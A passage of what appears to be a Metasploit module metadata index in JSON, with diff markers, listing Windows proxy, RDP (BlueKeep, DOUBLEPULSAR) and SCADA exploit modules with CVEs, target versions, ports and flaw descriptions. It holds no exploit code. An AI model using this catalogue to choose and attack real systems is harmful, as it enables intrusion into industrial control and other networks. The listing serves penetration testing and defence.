"Automatic", + "Windows 2000 Pro All - English", + "Windows 2000 Pro All - Italian", + "Windows 2000 Pro All - French", + "Windows XP SP0/1 - English", + "Windows XP SP2 - English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb", + "is_install_path": true, + "ref_name": "windows/proxy/ccproxy_telnet_ping", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/proxy/proxypro_http_get": { + "name": "Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow", + "fullname": "exploit/windows/proxy/proxypro_http_get", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-02-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Proxy-Pro Professional\n GateKeeper 4.7. By sending a long HTTP GET to the default port\n of 3128, a remote attacker could overflow a buffer and execute\n arbitrary code.", + "references": [ + "CVE-2004-0326", + "OSVDB-4027", + "BID-9716" + ], + "platform": "Windows", + "arch": "", + "rport": 3128, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Proxy-Pro GateKeeper 4.7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/proxy/proxypro_http_get.rb", + "is_install_path": true, + "ref_name": "windows/proxy/proxypro_http_get", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/proxy/qbik_wingate_wwwproxy": { + "name": "Qbik WinGate WWW Proxy Server URL Processing Overflow", + "fullname": "exploit/windows/proxy/qbik_wingate_wwwproxy", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-06-07", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in Qbik WinGate version\n 6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the\n HTTP proxy service on port 80, a remote attacker could overflow\n a buffer and execute arbitrary code.", + "references": [ + "CVE-2006-2926", + "OSVDB-26214", + "BID-18312" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "WinGate 6.1.1.1077" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb", + "is_install_path": true, + "ref_name": "windows/proxy/qbik_wingate_wwwproxy", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/rdp/cve_2019_0708_bluekeep_rce": { + "name": "CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free", + "fullname": "exploit/windows/rdp/cve_2019_0708_bluekeep_rce", + "aliases": [], + "rank": 0, + "disclosure_date": "2019-05-14", + "type": "exploit", + "author": [ + "Sean Dillon ", + "Ryan Hanson", + "OJ Reeves ", + "Brent Cook " + ], + "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n the freed channel is used to achieve arbitrary code execution.\n\n Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.\n\n Windows 7 SP1 should be exploitable in its default configuration, assuming your target\n selection is correctly matched to the system's memory layout.\n\n HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam\n *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2.\n This is a non-standard configuration for normal servers, and the target will crash if\n the aforementioned Registry key is not set!\n\n If the target is crashing regardless, you will likely need to determine the non-paged\n pool base in kernel memory and set it as the GROOMBASE option.", + "references": [ + "CVE-2019-0708", + "URL-https://github.com/zerosum0x0/CVE-2019-0708", + "URL-https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html" + ], + "platform": "Windows", + "arch": "", + "rport": 3389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic targeting via fingerprinting", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)" + ], + "mod_time": "2023-07-14 12:46:26 +0000", + "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb", + "is_install_path": true, + "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "Bluekeep" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/rdp/rdp_doublepulsar_rce": { + "name": "RDP DOUBLEPULSAR Remote Code Execution", + "fullname": "exploit/windows/rdp/rdp_doublepulsar_rce", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-04-14", + "type": "exploit", + "author": [ + "Equation Group", + "Shadow Brokers", + "Luke Jennings", + "wvu ", + "Tom Sellers", + "Spencer McIntyre" + ], + "description": "This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for RDP.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.", + "references": [ + "URL-https://github.com/countercept/doublepulsar-detection-script" + ], + "platform": "Windows", + "arch": "x64", + "rport": 3389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Execute payload (x64)", + "Neutralize implant" + ], + "mod_time": "2023-09-15 16:42:03 +0000", + "path": "/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb", + "is_install_path": true, + "ref_name": "windows/rdp/rdp_doublepulsar_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "DOUBLEPULSAR" + ], + "RelatedModules": [ + "exploit/windows/smb/smb_doublepulsar_rce" + ], + "Stability": [ + "crash-os-down" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/sage/x3_adxsrv_auth_bypass_cmd_exec": { + "name": "Sage X3 Administration Service Authentication Bypass Command Execution", + "fullname": "exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec", + "aliases": [], + "rank": 400, + "disclosure_date": "2021-07-07", + "type": "exploit", + "author": [ + "Jonathan Peterson ", + "Aaron Herndon" + ], + "description": "This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration\n protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an\n available AdxAdmin service.", + "references": [ + "CVE-2020-7387", + "CVE-2020-7388", + "URL-https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 1818, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Command", + "Windows DLL", + "Windows Executable" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/sage/x3_adxsrv_auth_bypass_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/sage/x3_adxsrv_auth_bypass_cmd_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "first-attempt-fail" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/scada/abb_wserver_exec": { + "name": "ABB MicroSCADA wserver.exe Remote Code Execution", + "fullname": "exploit/windows/scada/abb_wserver_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-04-05", + "type": "exploit", + "author": [ + "Brian Gorenc", + "juan vazquez " + ], + "description": "This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The\n issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe\n component, which allows arbitrary commands. The component is disabled by default, but\n required when a project uses the SCIL function WORKSTATION_CALL.\n\n This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 on\n Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2019-5620", + "OSVDB-100324", + "ZDI-13-270", + "URL-https://library.e.abb.com/public/41ccfa8ccd0431e6c1257c1200395574/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf" + ], + "platform": "Windows", + "arch": "x86", + "rport": 12221, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ABB MicroSCADA Pro SYS600 9.3" + ], + "mod_time": "2021-03-17 15:58:21 +0000", + "path": "/modules/exploits/windows/scada/abb_wserver_exec.rb", + "is_install_path": true, + "ref_name": "windows/scada/abb_wserver_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/advantech_webaccess_dashboard_file_upload": { + "name": "Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload", + "fullname": "exploit/windows/scada/advantech_webaccess_dashboard_file_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-02-05", + "type": "exploit", + "author": [ + "rgod", + "Zhou Yu <504137480@qq.com>", + "sinn3r " + ], + "description": "This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.\n\n This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations\n of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\n The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within\n the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to\n upload arbitrary code (instead of an image) to the server, which will then be executed under the\n high-privilege context of the IIS AppPool.", + "references": [ + "CVE-2016-0854", + "ZDI-16-128", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Advantech WebAccess 8.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb", + "is_install_path": true, + "ref_name": "windows/scada/advantech_webaccess_dashboard_file_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/scada/advantech_webaccess_webvrpcs_bof": { + "name": "Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow", + "fullname": "exploit/windows/scada/advantech_webaccess_webvrpcs_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2017-11-02", + "type": "exploit", + "author": [ + "mr_me " + ], + "description": "This module exploits a stack buffer overflow in Advantech WebAccess 8.2.\n By sending a specially crafted DCERPC request, an attacker could overflow\n the buffer and execute arbitrary code.", + "references": [ + "ZDI-17-938", + "CVE-2017-14016", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02" + ], + "platform": "Windows", + "arch": "", + "rport": 4592, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/advantech_webaccess_webvrpcs_bof.rb", + "is_install_path": true, + "ref_name": "windows/scada/advantech_webaccess_webvrpcs_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/citect_scada_odbc": { + "name": "CitectSCADA/CitectFacilities ODBC Buffer Overflow", + "fullname": "exploit/windows/scada/citect_scada_odbc", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-06-11", + "type": "exploit", + "author": [ + "KF ", + "aushack " + ], + "description": "This module exploits a stack buffer overflow in CitectSCADA's ODBC daemon.\n This has only been tested against Citect v5, v6 and v7.", + "references": [ + "CVE-2008-2639", + "BID-29634", + "OSVDB-46105", + "URL-http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability", + "URL-http://www.auscert.org.au/render.html?it=9433", + "URL-http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 20222, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Citect32.exe v5.21 NT4", + "Citect32.exe v5.21 2K/XP", + "Citect32.exe v5.41-r0 NT4", + "Citect32.exe v5.41-r0 2K/XP", + "Citect32.exe v6.0-r0 2K/XP", + "CiExceptionMailer.dll v5.42 on XP Sp2 or SP3", + "CiExceptionMailer.dll v6.0-r0 on Server 2003 Sp2", + "CiExceptionMailer.dll v6.0-r0 on XP Sp2 or SP3", + "CiExceptionMailer.dll v6.10 on XP Sp2 or SP3", + "CiExceptionMailer.dll v7.0-r0 on XP Sp2 or SP3", + "CiExceptionMailer.dll v7.0-r0 on 2003 Server SP1", + "CiExceptionMailer.dll v5.50-r0 XP SP2", + "CiExceptionMailer.dll v5.50-r0 2003 Server", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/citect_scada_odbc.rb", + "is_install_path": true, + "ref_name": "windows/scada/citect_scada_odbc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/codesys_gateway_server_traversal": { + "name": "SCADA 3S CoDeSys Gateway Server Directory Traversal", + "fullname": "exploit/windows/scada/codesys_gateway_server_traversal", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-02-02", + "type": "exploit", + "author": [ + "Enrique Sanchez " + ], + "description": "This module exploits a directory traversal vulnerability that allows arbitrary\n file creation, which can be used to execute a mof file in order to gain remote\n execution within the SCADA system.", + "references": [ + "CVE-2012-4705", + "OSVDB-90368", + "URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-050-01-a.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 1211, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal S3 CoDeSyS < 2.3.9.27" + ], + "mod_time": "2023-03-22 12:52:15 +0000", + "path": "/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb", + "is_install_path": true, + "ref_name": "windows/scada/codesys_gateway_server_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/scada/codesys_web_server": { + "name": "SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow", + "fullname": "exploit/windows/scada/codesys_web_server", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-12-02", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "Celil UNUVER", + "TecR0c ", + "sinn3r ", + "Michael Coppola" + ], + "description": "This module exploits a remote stack buffer overflow vulnerability in\n 3S-Smart Software Solutions product CoDeSys Scada Web Server Version\n 1.1.9.9. This vulnerability affects versions 3.4 SP4 Patch 2 and\n earlier.", + "references": [ + "CVE-2011-5007", + "OSVDB-77387", + "URL-http://aluigi.altervista.org/adv/codesys_1-adv.txt", + "EDB-18187", + "URL-https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-336-01A", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-12-006-01" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "CoDeSys v2.3 on Windows XP SP3", + "CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/codesys_web_server.rb", + "is_install_path": true, + "ref_name": "windows/scada/codesys_web_server", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/daq_factory_bof": { + "name": "DaqFactory HMI NETB Request Overflow", + "fullname": "exploit/windows/scada/daq_factory_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-09-13", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "mr_me " + ], + "description": "This module exploits a stack buffer overflow in Azeotech's DaqFactory\n product. The specific vulnerability is triggered when sending a specially crafted\n 'NETB' request to port 20034. Exploitation of this vulnerability may take a few\n seconds due to the use of egghunter. This vulnerability was one of the 14\n releases discovered by researcher Luigi Auriemma.", + "references": [ + "CVE-2011-3492", + "OSVDB-75496", + "URL-http://aluigi.altervista.org/adv/daqfactory_1-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-264-01" + ], + "platform": "Windows", + "arch": "", + "rport": 20034, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "DAQFactory Pro 5.85 Build 1853 on Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/daq_factory_bof.rb", + "is_install_path": true, + "ref_name": "windows/scada/daq_factory_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/delta_ia_commgr_bof": { + "name": "Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow", + "fullname": "exploit/windows/scada/delta_ia_commgr_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-07-02", + "type": "exploit", + "author": [ + "ZDI", + "t4rkd3vilz", + "hubertwslin" + ], + "description": "This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial\n Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially\n crafted packets. This module has been tested successfully on Delta Electronics Delta\n Industrial Automation COMMGR 1.08 over\n Windows XP SP3,\n Windows 7 SP1, and\n Windows 8.1.", + "references": [ + "CVE-2018-10594", + "BID-104529", + "ZDI-18-586", + "ZDI-18-588", + "EDB-44965", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01" + ], + "platform": "Windows", + "arch": "", + "rport": 502, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "COMMGR 1.08 / Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/delta_ia_commgr_bof.rb", + "is_install_path": true, + "ref_name": "windows/scada/delta_ia_commgr_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/diaenergie_sqli": { + "name": "DIAEnergie SQL Injection (CVE-2024-4548)", + "fullname": "exploit/windows/scada/diaenergie_sqli", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-05-06", + "type": "exploit", + "author": [ + "Michael Heinzl", + "Tenable" + ], + "description": "SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.\n This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\\SYSTEM.", + "references": [ + "URL-https://www.tenable.com/security/research/tra-2024-13", + "CVE-2024-4548" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 928, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows_Fetch" + ], + "mod_time": "2024-08-19 22:47:19 +0000", + "path": "/modules/exploits/windows/scada/diaenergie_sqli.rb", + "is_install_path": true, + "ref_name": "windows/scada/diaenergie_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/factorylink_csservice": { + "name": "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow", + "fullname": "exploit/windows/scada/factorylink_csservice", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-03-25", + "type": "exploit", + "author": [ + "Luigi Auriemma ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found on Siemens FactoryLink 8. The\n vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message,\n the user-supplied path first gets converted to ANSI format (CodePage 0), and then\n gets handled by a logging routine where proper bounds checking is not done,\n therefore causing a stack-based buffer overflow, and results arbitrary code execution.", + "references": [ + "OSVDB-72812", + "URL-http://aluigi.altervista.org/adv/factorylink_1-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01" + ], + "platform": "Windows", + "arch": "", + "rport": 7580, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP3", + "Windows Server 2003 SP0" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/factorylink_csservice.rb", + "is_install_path": true, + "ref_name": "windows/scada/factorylink_csservice", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/factorylink_vrn_09": { + "name": "Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow", + "fullname": "exploit/windows/scada/factorylink_vrn_09", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-03-21", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "hal", + "MC " + ], + "description": "This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,\n and 8.0.1.703. By sending a specially crafted packet, an attacker may be able to\n execute arbitrary code due to the improper use of a vsprintf() function while\n processing the user-supplied text field. Originally found and posted by\n Luigi Auriemma.", + "references": [ + "OSVDB-72815", + "URL-http://aluigi.altervista.org/adv/factorylink_4-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01" + ], + "platform": "Windows", + "arch": "", + "rport": 7579, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "FactoryLink 7.5", + "FactoryLink 7.5 SP2", + "FactoryLink 8.0.1.703" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/factorylink_vrn_09.rb", + "is_install_path": true, + "ref_name": "windows/scada/factorylink_vrn_09", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/ge_proficy_cimplicity_gefebt": { + "name": "GE Proficy CIMPLICITY gefebt.exe Remote Code Execution", + "fullname": "exploit/windows/scada/ge_proficy_cimplicity_gefebt", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-01-23", + "type": "exploit", + "author": [ + "amisto0x07", + "Z0mb1E", + "juan vazquez " + ], + "description": "This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the\n CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in\n shared resources. An attacker can abuse this behavior to execute a malicious BCL and\n drop an arbitrary EXE. The last one can be executed remotely through the WebView server.\n This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded\n CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. If\n the target does not have the WebClient service enabled, an external SMB service is necessary.", + "references": [ + "CVE-2014-0750", + "ZDI-14-015", + "URL-http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)" + ], + "mod_time": "2017-09-13 22:03:34 +0000", + "path": "/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb", + "is_install_path": true, + "ref_name": "windows/scada/ge_proficy_cimplicity_gefebt", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/iconics_genbroker": { + "name": "Iconics GENESIS32 Integer Overflow Version 9.21.201.01", + "fullname": "exploit/windows/scada/iconics_genbroker", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-03-21", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "Lincoln", + "corelanc0d3r " + ], + "description": "The GenBroker service on port 38080 is affected by three integer overflow\n vulnerabilities while handling opcode 0x4b0, which is caused by abusing the\n the memory allocations needed for the number of elements passed by the client.\n This results unexpected behaviors such as direct registry calls, memory location\n calls, or arbitrary remote code execution. Please note that in order to ensure\n reliability, this exploit will try to open calc (hidden), inject itself into the\n process, and then open up a shell session. Also, DEP bypass is supported.", + "references": [ + "OSVDB-72817", + "URL-http://aluigi.org/adv/genesis_4-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-080-02" + ], + "platform": "Windows", + "arch": "", + "rport": 38080, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/iconics_genbroker.rb", + "is_install_path": true, + "ref_name": "windows/scada/iconics_genbroker", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/iconics_webhmi_setactivexguid": { + "name": "ICONICS WebHMI ActiveX Buffer Overflow", + "fullname": "exploit/windows/scada/iconics_webhmi_setactivexguid", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-05-05", + "type": "exploit", + "author": [ + "Scoot Bell ", + "Blair Strang ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control.\n By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll\n fails to do any proper bounds checking before this input is copied onto the stack,\n which causes a buffer overflow, and results arbitrary code execution under the context\n of the user.", + "references": [ + "CVE-2011-2089", + "OSVDB-72135", + "URL-http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf", + "EDB-17240", + "URL-https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-080-02" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6/7/8 on Windows XP SP3", + "IE 7 on Windows Vista" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb", + "is_install_path": true, + "ref_name": "windows/scada/iconics_webhmi_setactivexguid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/igss9_igssdataserver_listall": { + "name": "7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow", + "fullname": "exploit/windows/scada/igss9_igssdataserver_listall", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-03-24", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "Lincoln", + "corelanc0d3r ", + "sinn3r " + ], + "description": "This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies\n IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows to overwrite a structured exception handling record\n on the stack, allowing for unauthenticated remote code execution. Also, after the payload\n exits, IGSSdataServer.exe should automatically recover.", + "references": [ + "CVE-2011-1567", + "OSVDB-72353", + "URL-http://aluigi.altervista.org/adv/igss_2-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A" + ], + "platform": "Windows", + "arch": "", + "rport": 12401, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb", + "is_install_path": true, + "ref_name": "windows/scada/igss9_igssdataserver_listall", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/igss9_igssdataserver_rename": { + "name": "7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow", + "fullname": "exploit/windows/scada/igss9_igssdataserver_rename", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-03-24", + "type": "exploit", + "author": [ + "Luigi Auriemma ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found on 7-Technologies IGSS 9. By supplying\n a long string of data to the 'Rename' (0x02), 'Delete' (0x03), or 'Add' (0x04) command,\n a buffer overflow condition occurs in IGSSdataServer.exe while handing an RMS report,\n which results arbitrary code execution under the context of the user.\n\n The attack is carried out in three stages. The first stage sends the final payload to\n IGSSdataServer.exe, which will remain in memory. The second stage sends the Add command\n so the process can find a valid ID for the Rename command. The last stage then triggers\n the vulnerability with the Rename command, and uses an egghunter to search for the\n shellcode that we sent in stage 1. The use of egghunter appears to be necessary due to\n the small buffer size, which cannot even contain our ROP chain and the final payload.", + "references": [ + "CVE-2011-1567", + "OSVDB-72352", + "URL-http://aluigi.altervista.org/adv/igss_5-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A" + ], + "platform": "Windows", + "arch": "", + "rport": 12401, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP3", + "Windows Server 2003 SP2/R2 SP2" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb", + "is_install_path": true, + "ref_name": "windows/scada/igss9_igssdataserver_rename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": 